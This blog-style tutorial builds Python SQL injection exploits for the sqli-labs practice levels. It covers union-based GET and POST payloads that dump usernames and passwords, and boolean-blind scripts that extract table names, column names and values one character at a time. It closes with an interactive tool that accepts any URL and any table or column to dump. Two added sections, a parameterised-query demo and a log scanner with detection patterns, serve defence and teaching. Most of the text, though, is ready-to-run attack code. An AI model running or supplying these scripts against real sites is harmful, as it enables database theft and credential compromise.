Writing Exploits

Writing an exploit for GET-type SQL injection

I recently learned some Python basics and plan to use Python as my language for writing exploits and PoCs from now on.

Today I started with level 1 of sqli-labs; this is the exploit for a GET-type SQL injection.

The exploit is as follows:

import requests
import re

url = 'http://sql.com/Less-1/'
# Union-based payload: the closing quote ends the id literal, and the
# group_concat of username,password pairs lands in the second selected column
payload = "?id=-1' union select 1,group_concat('~',username,',',password,'~'),3 from users --+"
all = str(url) + str(payload)
res = requests.get(all)
text = res.text
# Pull out every value wrapped between the '~' markers placed around each pair
result = re.findall('~(.*?)~', text)
print(result)

Import the re and requests libraries, then initialise the payload.

Concatenate the url and the payload, converting both to str first.

Then take the page source of the response.

Then use a regular expression to match the data we want.


Writing an exploit for POST-type SQL injection

import requests
import re

# Union-based payload sent in the uname form field; the '~' markers make the
# username,password pairs easy to pick out of the response
payload = "1' union select 1,group_concat('~',username,',',password,'~') from users #"
response = requests.post(
    url='http://sql.com/Less-11/',
    headers={
        'Content-Type': 'application/x-www-form-urlencoded;charset=UTF-8'
    },
    data={
        'uname': payload,
        'passwd': 1,
        'submit': 'Submit'
    }
)
text = response.text
print(re.findall('~(.*?)~', text))

This demonstration uses level 11 of sqli-labs; to reuse it, just replace the payload.

The method is almost the same as for the GET type, except that requests.get becomes requests.post.

The only difference is that the POST type needs headers and data, whereas the GET type only needs the url and the payload concatenated.


Writing a GET-type injection exploit based on boolean-based blind injection

Level 8 of sqli-labs is used for the demonstration here.

This uses boolean-based blind injection. First, the exploit that dumps the table names in the current database:

import requests
import re

url = 'http://sql.com/Less-8/'
for x in range(0, 5):  # number of tables to enumerate
    table = ''
    for i in range(1, 30):  # character position in the table name (substr is 1-indexed)
        for j in range(31, 128):  # printable ASCII value tried at that position
            # payload="?id=1' and (select length(database()) ="+str(i)+")--+"
            payload = "?id=1' and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(x)+",1) ,"+str(i)+",1)) = "+str(j)+") --+"
            all = str(url) + str(payload)
            res = requests.get(all)
            text = res.text
            content = 'You are in'  # the page shows this only when the injected condition is true
            result = (text.find(content))
            if (result != -1):
                table = table + chr(j)
                break  # character found, move on to the next position
    print("第"+str(x+1)+"个表的表名是:"+table)
print('结束')

Next, the exploit that dumps the column names:

import requests
import re

url = 'http://sql.com/Less-8/'
for x in range(0, 10):  # number of columns to enumerate
    column = ''
    for i in range(1, 30):  # character position in the column name
        for j in range(31, 128):  # printable ASCII value tried at that position
            # payload="?id=1' and (select length(database()) ="+str(i)+")--+"
            # payload="?id=1' and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(x)+",1) ,"+str(i)+",1)) = "+str(j)+") --+"
            payload = "?id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' limit "+str(x)+",1) ,"+str(i)+",1)) = "+str(j)+") --+"
            all = str(url) + str(payload)
            res = requests.get(all)
            text = res.text
            content = 'You are in'  # the page shows this only when the injected condition is true
            result = (text.find(content))
            if (result != -1):
                column = column + chr(j)
                break  # character found, move on to the next position
    print("第"+str(x+1)+"个列的列名是:"+column)
print('结束')

The exploit that dumps the data:

import requests
import re

url = 'http://sql.com/Less-8/'
for x in range(0, 10):  # number of rows to dump
    value = ''
    for i in range(1, 30):  # character position in the value
        for j in range(31, 128):  # printable ASCII value tried at that position
            # payload="?id=1' and (select length(database()) ="+str(i)+")--+"
            # payload="?id=1' and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit "+str(x)+",1) ,"+str(i)+",1)) = "+str(j)+") --+"
            # payload="?id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' limit "+str(x)+",1) ,"+str(i)+",1)) = "+str(j)+") --+"
            payload = "?id=1' and (select ascii(substr((select username from users limit " + str(x) + ",1) ," + str(i) + ",1)) = " + str(j) + ") --+"
            all = str(url) + str(payload)
            res = requests.get(all)
            text = res.text
            content = 'You are in'  # the page shows this only when the injected condition is true
            result = (text.find(content))
            if (result != -1):
                value = value + chr(j)  # was appending to an undefined 'column'; the value is being built here
                break  # character found, move on to the next position
    print("第"+str(x+1)+"个值是:"+value)
print('结束')

Using three exploits for a single injection point is cumbersome, so I'll see whether I can optimise them into one exploit. The x, j and i in the exploits above should be adjusted to the actual number of tables and columns.

So I wrote a three-in-one exploit:
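All three blind scripts depend on the same server-side defect: the id parameter is concatenated into the query text, so the closing quote and everything after it is parsed as SQL, and the "You are in" row appears only when the injected condition is true. The following is an added example, not code from the original post or from sqli-labs: a small in-memory SQLite stand-in (a constructed users table, plus an ascii() function registered so the post's payload parses as it would on MySQL) that runs the post's own data-dump probe against a concatenated query and against a parameterised one, to show that the true/false oracle exists in the first and disappears in the second. Table contents, the helper names and the query shape mirroring sqli-labs are assumptions.

```python
import sqlite3


def build_db():
    # Constructed sample data standing in for the sqli-labs users table
    conn = sqlite3.connect(":memory:")
    # SQLite has no ascii(); register one so the post's payload runs as it would on MySQL
    conn.create_function("ascii", 1, lambda s: ord(s[0]) if s else 0)
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'alice', 'p@ss-1'), (2, 'bob', 'p@ss-2');
    """)
    return conn


def vulnerable_lookup(conn, user_id):
    # String concatenation, the sqli-labs shape: a quote in user_id ends the
    # literal and the remainder of the input is parsed as SQL
    sql = "SELECT username FROM users WHERE id='" + user_id + "' LIMIT 0,1"
    return [row[0] for row in conn.execute(sql)]


def safe_lookup(conn, user_id):
    # Parameter binding: user_id is always one bound value, never query text,
    # so the quote and the subselect are compared against id as a plain string
    sql = "SELECT username FROM users WHERE id=? LIMIT 0,1"
    return [row[0] for row in conn.execute(sql, (user_id,))]


def blind_probe(ascii_value):
    # The post's data-dump probe with its loop variables fixed: row 0, position 1,
    # and ascii_value as the guess for that character
    return ("1' and (select ascii(substr((select username from users limit 0,1) ,1,1)) = "
            + str(ascii_value) + ") --+")


def page_shows_row(lookup, conn, user_id):
    # Models the post's "You are in" check: the row renders only when WHERE is true
    return len(lookup(conn, user_id)) > 0


if __name__ == "__main__":
    conn = build_db()
    for guess in (ord("a"), ord("b")):
        print("concatenated query, guess %d: %s" % (
            guess, page_shows_row(vulnerable_lookup, conn, blind_probe(guess))))
        print("parameterised query, guess %d: %s" % (
            guess, page_shows_row(safe_lookup, conn, blind_probe(guess))))
```

Against vulnerable_lookup the guess 97 ('a', the first character of the constructed username) shows the row and 98 does not, which is exactly the signal the loops in the post key on; against safe_lookup both guesses return nothing because no id equals the whole probe string, so there is no oracle left to read one character at a time.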

import requests

url = input("输入需要注入的URL:")
print("1.爆当前数据库的数据表名")
print("2.爆指定数据表的列名")
print("3.爆出数据库里的数据")
print("输入你要使用的功能(输入数字1,2或者3):")
select = input("请输入你选择的功能:")
if (select == '1'):
    for i in range(0, 5):  # number of tables
        table = ''
        for j in range(1, 30):  # table name length (substr positions start at 1)
            for k in range(31, 128):  # ASCII value of one character of the table name
                payload = "?id=1' and (select ascii(substr((select table_name from information_schema.tables where table_schema=database() limit " + str(i) + ",1) ," + str(j) + ",1)) = " + str(k) + ") --+"
                all = str(url) + str(payload)
                res = requests.get(all)
                text = res.text
                content = 'You are in'
                result = (text.find(content))
                if (result != -1):
                    table = table + chr(k)
                    break  # character found, move on to the next position
        print("第" + str(i + 1) + "个表的表名是:" + table)
if (select == '2'):
    for a in range(0, 5):  # number of columns
        column = ''
        for b in range(1, 30):  # column name length (substr positions start at 1)
            for c in range(31, 128):  # ASCII value of one character of the column name
                payload = "?id=1' and (select ascii(substr((select column_name from information_schema.columns where table_name='users' limit "+str(a)+",1) ,"+str(b)+",1)) = "+str(c)+") --+"
                all = str(url) + str(payload)
                res = requests.get(all)
                text = res.text
                content = 'You are in'
                result = (text.find(content))
                if (result != -1):
                    column = column + chr(c)
                    break  # character found, move on to the next position
        print("第" + str(a + 1) + "个列名是:" + column)
if (select == '3'):
    zd = input("要爆哪一列的数据:")    # column to dump
    biao = input("要爆哪一个表的数据:")  # table to dump from
    for d in range(0, 5):  # number of values
        value = ''
        for e in range(1, 30):  # value length (substr positions start at 1)
            for f in range(31, 128):  # ASCII value of one character of the value
                payload = "?id=1' and (select ascii(substr((select "+zd+" from "+biao+" limit " + str(d) + ",1) ," + str(e) + ",1)) = " + str(f) + ") --+"
                all = str(url) + str(payload)
                res = requests.get(all)
                text = res.text
                content = 'You are in'
                result = (text.find(content))
                if (result != -1):
                    value = value + chr(f)
                    break  # character found, move on to the next position
        print("第" + str(d + 1) + "个值是:" + value)
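From the operator's side, the scripts on this page leave a distinctive trace: the union variants put union select and group_concat into one request, and the blind variants send one request per candidate character, each carrying and (select ascii(substr( and usually an information_schema reference. The following is an added example, not part of the original post: a scanner over constructed combined-format access log lines that URL-decodes each request path, tags these patterns, and flags clients whose blind-probe count crosses a threshold. The sample log lines, client addresses, signature names and the threshold are all constructed. Note that POST bodies (the Less-11 case) are not recorded in a standard access log, so that variant needs request-body logging or a WAF to be seen at all.

```python
import re
from urllib.parse import unquote_plus

# Combined-format access log line: client, timestamp, request line, status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)

# Minimal heuristics for the request shapes the post's scripts generate;
# a production ruleset would be broader and normalise more aggressively
SIGNATURES = {
    "union-based": re.compile(r"union\s+(all\s+)?select", re.I),
    "boolean-blind": re.compile(r"\band\s*\(\s*select\s+ascii\s*\(\s*substr\s*\(", re.I),
    "schema-enum": re.compile(r"information_schema\.(tables|columns)", re.I),
}

# Constructed sample log: one normal request, one union request, three blind
# probes from a second client, and a POST whose body is not visible in the log
SAMPLE_LOG = [
    '198.51.100.7 - - [30/Jul/2021:18:47:22 +0800] "GET /Less-1/?id=1 HTTP/1.1" 200 731',
    '198.51.100.7 - - [30/Jul/2021:18:47:23 +0800] "GET /Less-1/?id=-1%27%20union%20select%201,'
    'group_concat(%27~%27,username,%27,%27,password,%27~%27),3%20from%20users%20--+ HTTP/1.1" 200 912',
    '203.0.113.5 - - [30/Jul/2021:19:10:01 +0800] "GET /Less-8/?id=1%27%20and%20(select%20ascii(substr('
    '(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()'
    '%20limit%200,1)%20,1,1))%20=%2031)%20--+ HTTP/1.1" 200 695',
    '203.0.113.5 - - [30/Jul/2021:19:10:01 +0800] "GET /Less-8/?id=1%27%20and%20(select%20ascii(substr('
    '(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()'
    '%20limit%200,1)%20,1,1))%20=%2032)%20--+ HTTP/1.1" 200 695',
    '203.0.113.5 - - [30/Jul/2021:19:10:02 +0800] "GET /Less-8/?id=1%27%20and%20(select%20ascii(substr('
    '(select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()'
    '%20limit%200,1)%20,1,1))%20=%2033)%20--+ HTTP/1.1" 200 695',
    '192.0.2.9 - - [30/Jul/2021:19:12:40 +0800] "POST /Less-11/ HTTP/1.1" 200 812',
]


def classify_request(path):
    # Decode once so %27, %20 and '+' look like the text the database would see
    decoded = unquote_plus(path)
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(decoded))


def scan_access_log(lines, blind_threshold=3):
    hits = []          # (client, raw path, matched signatures) for every flagged request
    blind_count = {}   # blind probes per client
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify_request(m.group("path"))
        if not tags:
            continue
        hits.append((m.group("ip"), m.group("path"), tags))
        if "boolean-blind" in tags:
            blind_count[m.group("ip")] = blind_count.get(m.group("ip"), 0) + 1
    # A blind dump needs one request per candidate character, so volume per
    # client is the tell even if any single request looked ambiguous
    noisy = {ip: n for ip, n in blind_count.items() if n >= blind_threshold}
    return hits, noisy


if __name__ == "__main__":
    hits, noisy = scan_access_log(SAMPLE_LOG)
    for ip, path, tags in hits:
        print(ip, tags, path[:60])
    print("clients over blind-probe threshold:", noisy)
```

The per-client counter matters more than any single signature: one matching request can be a false positive, but dozens of near-identical requests that differ only in the compared integer are the loop in the post, and that rate is also what a WAF or rate limit on the id parameter would act on.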